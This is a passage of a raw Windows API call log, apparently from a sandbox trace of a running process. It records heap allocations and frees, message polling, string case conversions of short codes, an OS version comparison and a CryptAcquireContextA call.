Size=0x4) returned 0x24b2ba8 [0162.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0162.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0162.753] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0162.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0162.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0162.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.754] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.774] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.775] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.775] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.775] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.775] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.775] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.775] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0162.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0162.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0162.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0162.779] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0162.780] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.781] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.781] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0162.781] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.781] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0162.781] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.781] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.782] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.782] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.782] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.782] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.782] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.782] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.782] 